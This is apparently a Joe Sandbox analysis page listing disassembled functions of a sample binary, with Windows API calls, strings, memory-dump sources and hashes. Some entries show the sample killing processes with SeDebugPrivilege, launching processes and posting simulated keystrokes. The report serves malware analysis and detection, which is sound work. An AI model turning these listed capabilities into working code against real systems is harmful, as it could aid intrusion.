Opcode Fuzzy Hash: 2ee46e941ccb14265ee8d03be99f921abc1f9bf673ca47d714c2b8f9973fa8d8
Instruction Fuzzy Hash: F0318D75700205BBFB20DF54EC88F6977AAFB9A351F508229F900D61E0EB78DD508B64

Function 0074FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0074FAA6
OleUninitialize.OLE32(?,00000000), ref: 0074FB45
UnregisterHotKey.USER32(?), ref: 0074FC9C
DestroyWindow.USER32(?), ref: 007845D6
FreeLibrary.KERNEL32(?), ref: 0078463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00784668

Strings

close all, xrefs: 0074FAA1

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 94b59d15b00af7508bababd3bb86e895ad58626cc2fbb48d56b295fa9474a675
Instruction ID: d709d866bdb0676bf587b26f739e14fe42e3743952ae8c8466d771400de21098
Opcode Fuzzy Hash: 94b59d15b00af7508bababd3bb86e895ad58626cc2fbb48d56b295fa9474a675
Instruction Fuzzy Hash: BEA17F70701212CFCB29EF14C998E69F3A5BF15710F5442ADE80AAB262DB78ED16CF50

Function 0079A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0079A439), ref: 0079A377

Strings

REGEXPCLASS, xrefs: 0079A13C
CLASS, xrefs: 0079A0F6
TEXT, xrefs: 0079A2AE
NAME, xrefs: 0079A1A9
CLASSNN, xrefs: 0079A119
INSTANCE, xrefs: 0079A285

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: fbb642e0335413d0a1b1f2564430dcfdef852ee08529813a77cf9658dc2d8ff9
Instruction ID: a8b03c088f504b6b2c4a23b0416bd4f1a549278e3c9b986d3af04b268029da2c
Opcode Fuzzy Hash: fbb642e0335413d0a1b1f2564430dcfdef852ee08529813a77cf9658dc2d8ff9
Instruction Fuzzy Hash: D891C430A0160AFACF08DFA0D44ABEEFB74BF44300F548119E85AA7251DF396999DBD1

Function 007CB351 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(012726B0), ref: 007CB3EB
IsWindowEnabled.USER32(012726B0), ref: 007CB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007CB4DB
SendMessageW.USER32(012726B0,000000B0,?,?), ref: 007CB512
IsDlgButtonChecked.USER32(?,?), ref: 007CB54F
GetWindowLongW.USER32(012726B0,000000EC), ref: 007CB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007CB589

Strings

@U=u, xrefs: 007CB4DB, 007CB512, 007CB589

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: @U=u
API String ID: 4072528602-2594219639
Opcode ID: ad0ac84ed0dc7430ad7d7d9bcdbddd580644ff4b99d7b03d9b7308b44d55044f
Instruction ID: 819971bf5e7f714c88b52e1d138797040d8e53cbc5a0affe5bcfc8c84a8976b1
Opcode Fuzzy Hash: ad0ac84ed0dc7430ad7d7d9bcdbddd580644ff4b99d7b03d9b7308b44d55044f
Instruction Fuzzy Hash: 24718134608684EFDB249FA4C896FBA7BB5FF09300F14815DFA45972A2C739AE50DB50

Function 007C62CD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007C62EC
GetWindowLongW.USER32(012726B0,000000F0), ref: 007C631F
GetWindowLongW.USER32(012726B0,000000F0), ref: 007C6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007C6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007C63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 007C63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007C63DB

Strings

@U=u, xrefs: 007C62EC, 007C6386, 007C63B0

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: @U=u
API String ID: 2178440468-2594219639
Opcode ID: 6a597dadeb05813cb9fbf505e9a08761e73fdd8a84b4ed9828a5fc5e119dc776
Instruction ID: fef0bb80bfd2154bfef7dcbf13b07b668211375a2d83423487142b1e37262a37
Opcode Fuzzy Hash: 6a597dadeb05813cb9fbf505e9a08761e73fdd8a84b4ed9828a5fc5e119dc776
Instruction Fuzzy Hash: 4331EE34644290EFDB208F18DCC4F5A37E1BB4A714F1981ACF9019F2B2CB79A8409B55

Function 007B8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,007CF910), ref: 007B8D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007CF910), ref: 007B8D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007B8ED6
SysFreeString.OLEAUT32(?), ref: 007B8F00

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 0ddcd51380749086af437dd418833c91ef071ed0b7807221870263a01d55d16e
Instruction ID: 3a270ed5a003db4b162f0fda4085ed55a904762afc1c8f8dca95d6901f6eaa87
Opcode Fuzzy Hash: 0ddcd51380749086af437dd418833c91ef071ed0b7807221870263a01d55d16e
Instruction Fuzzy Hash: 56F11771A00109EFCB54EF94C888EEEB7B9FF49314F108498FA15AB251DB35AE45CB61

Function 007BF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007BF6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BF848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BF86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BF8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BF8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007BFA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007BFA7C
CloseHandle.KERNEL32(?), ref: 007BFAAB
CloseHandle.KERNEL32(?), ref: 007BFB22

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: bcee053e33a408efb4c78c8359b889c63630bf2f7d2e8ee76e8df8ad5146b7b2
Instruction ID: 7f8132130bc37d8d3632bd584b6b3f95ee1ea83ecbb1a91822b2cd36e60ece63
Opcode Fuzzy Hash: bcee053e33a408efb4c78c8359b889c63630bf2f7d2e8ee76e8df8ad5146b7b2
Instruction Fuzzy Hash: 88E19F71204200DFC714EF34C885BAABBE1EF85714F14896DF8999B2A2DB39EC45CB52

Function 0074201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00741B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00742036,?,00000000,?,?,?,?,007416CB,00000000,?), ref: 00741B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007420D3
KillTimer.USER32(-00000001,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0074216E
DestroyAcceleratorTable.USER32(00000000), ref: 0077BCA6
DeleteObject.GDI32(00000000), ref: 0077BD1C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 9e4199259bd4b4274f66e702f4c5e6beea6f94940ad67c8f3f07ac9c031612dc
Instruction ID: 4a64ac05a0091e787094bb415798c2674cfa3240f1d6c3bea0bb8aa4058a5471
Opcode Fuzzy Hash: 9e4199259bd4b4274f66e702f4c5e6beea6f94940ad67c8f3f07ac9c031612dc
Instruction Fuzzy Hash: 3F617931210A00DFDB359F14D948B2AB7F2FB44316F90C52CE5468A971C778A8A2DFA4

Function 007A4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007A3697,?), ref: 007A468B

Part of subcall function 007A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007A3697,?), ref: 007A46A4

Part of subcall function 007A4A31: GetFileAttributesW.KERNEL32(?,007A370B), ref: 007A4A32

lstrcmpiW.KERNEL32(?,?), ref: 007A4D40
_wcscmp.LIBCMT ref: 007A4D5A
MoveFileW.KERNEL32(?,?), ref: 007A4D75

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 4c2b024d7984f984ef2af50cf7f023243d1661aa0db7a7edcffcb216a547df1e
Instruction ID: 61179c4fabf01ce5a6b0d1b87d3b1ed01182cad46e283d033d3205f35634eb57
Opcode Fuzzy Hash: 4c2b024d7984f984ef2af50cf7f023243d1661aa0db7a7edcffcb216a547df1e
Instruction Fuzzy Hash: 335174B25083849BC764DB60D8859DFB3ECAFC5310F004A2EF68AC3152EF79A588C756

Function 0079966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0079A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079A84C
Part of subcall function 0079A82C: GetCurrentThreadId.KERNEL32 ref: 0079A853
Part of subcall function 0079A82C: AttachThreadInput.USER32(00000000,?,00799683,?,00000001), ref: 0079A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0079968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007996AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007996AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 007996B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007996D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007996D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 007996E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007996F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007996FB

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: da6aa901fc0552317c021b96ece515fb290e2811ef328946858fc65ee42d7bf8
Instruction ID: cce2e9ac0e05c82f2d2347b63f8d6d38877e7e206b308dd5ba34c423255d8eba
Opcode Fuzzy Hash: da6aa901fc0552317c021b96ece515fb290e2811ef328946858fc65ee42d7bf8
Instruction Fuzzy Hash: E811C271910218FFFA106B649C4DF6A3B1EDB4C790F114429F744AB0A0CAF75C109AA8

Function 00798921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0079853C,00000B00,?,?), ref: 0079892A
RtlAllocateHeap.NTDLL(00000000,?,0079853C), ref: 00798931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0079853C,00000B00,?,?), ref: 00798946
GetCurrentProcess.KERNEL32(?,00000000,?,0079853C,00000B00,?,?), ref: 0079894E
DuplicateHandle.KERNEL32(00000000,?,0079853C,00000B00,?,?), ref: 00798951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0079853C,00000B00,?,?), ref: 00798961
GetCurrentProcess.KERNEL32(0079853C,00000000,?,0079853C,00000B00,?,?), ref: 00798969
DuplicateHandle.KERNEL32(00000000,?,0079853C,00000B00,?,?), ref: 0079896C
CreateThread.KERNEL32(00000000,00000000,00798992,00000000,00000000,00000000), ref: 00798986

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
String ID:
API String ID: 1422014791-0
Opcode ID: 00e110f6f6109d0a5b4279a5724fa8c00e71825cb6b1a9051c01e9541294c606
Instruction ID: 016b3a2d477c8c589d56daddae883abbd91250ec01bd0f94f2241f590f447b77
Opcode Fuzzy Hash: 00e110f6f6109d0a5b4279a5724fa8c00e71825cb6b1a9051c01e9541294c606
Instruction Fuzzy Hash: A501BBB5240308FFE710ABA5DC4DF6B7BADEB89711F448425FA05DB1A1CA759C00CB25

Function 007B975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0079710A: CLSIDFromProgID.COMBASE ref: 00797127
Part of subcall function 0079710A: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00797142
Part of subcall function 0079710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00797044,80070057,?,?), ref: 00797150
Part of subcall function 0079710A: CoTaskMemFree.COMBASE(00000000), ref: 00797160

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 007B9806
_memset.LIBCMT ref: 007B9813
_memset.LIBCMT ref: 007B9956
CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 007B9982
CoTaskMemFree.COMBASE(?), ref: 007B998D

Strings

NULL Pointer assignment, xrefs: 007B99DB

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: d84b4ce6a3ebf26f14466826e09768d7259856a5d9a0a7fa903d5d6dae891343
Instruction ID: cdb589de7a6e8a8c30abf9adb2ae4cb8b3ba7cec0e6e72325080977a6e724273
Opcode Fuzzy Hash: d84b4ce6a3ebf26f14466826e09768d7259856a5d9a0a7fa903d5d6dae891343
Instruction Fuzzy Hash: CF914971D00228EBDB10DFA5DC45EDEBBB9EF08710F10815AF619A7291DB75AA44CFA0

Function 007BE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 007A3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 007A3C7A
Part of subcall function 007A3C55: Process32FirstW.KERNEL32(00000000,?), ref: 007A3C88
Part of subcall function 007A3C55: CloseHandle.KERNEL32(00000000), ref: 007A3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BE9A4
GetLastError.KERNEL32 ref: 007BE9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BE9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 007BEA63
GetLastError.KERNEL32(00000000), ref: 007BEA6E
CloseHandle.KERNEL32(00000000), ref: 007BEAA3

Strings

SeDebugPrivilege, xrefs: 007BE9C2

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 0493d65b8d11a72b6f1533faaf67206cadf8addb8e7bfc6e29b221b4c2804d20
Instruction ID: 010ffc4ed3c5454a88b868231d0773c3f0d5d89d2369b30954c4bc4c3581d227
Opcode Fuzzy Hash: 0493d65b8d11a72b6f1533faaf67206cadf8addb8e7bfc6e29b221b4c2804d20
Instruction Fuzzy Hash: 99418D71200201DFDB14EF24DC99FAEBBA9AF40314F148459F9429B3D2CB79A904CB95

Function 007CB69E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(008057B0,00000000,012726B0,?,?,008057B0,?,007CB5A8,?,?), ref: 007CB712
EnableWindow.USER32(00000000,00000000), ref: 007CB736
ShowWindow.USER32(008057B0,00000000,012726B0,?,?,008057B0,?,007CB5A8,?,?), ref: 007CB796
ShowWindow.USER32(00000000,00000004,?,007CB5A8,?,?), ref: 007CB7A8
EnableWindow.USER32(00000000,00000001), ref: 007CB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 007CB7EF

Strings

@U=u, xrefs: 007CB7EF

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: @U=u
API String ID: 642888154-2594219639
Opcode ID: 97668e55cde857a477091ecd7bd80bf0b75529678a3909af162a620a2064a2af
Instruction ID: 35facad1ea688863177b633d905e8bd2cb724d97436c8c2c6337b7da83661b97
Opcode Fuzzy Hash: 97668e55cde857a477091ecd7bd80bf0b75529678a3909af162a620a2064a2af
Instruction Fuzzy Hash: 29414C34600240AFDB26CF24C49AF947BE1FB45310F5881BEFD489F6A2C739A85ACB51

Function 007A2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 007A3033

Strings

info, xrefs: 007A2FD4
blank, xrefs: 007A2FB5
question, xrefs: 007A2FEC
warning, xrefs: 007A301C
stop, xrefs: 007A3004

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
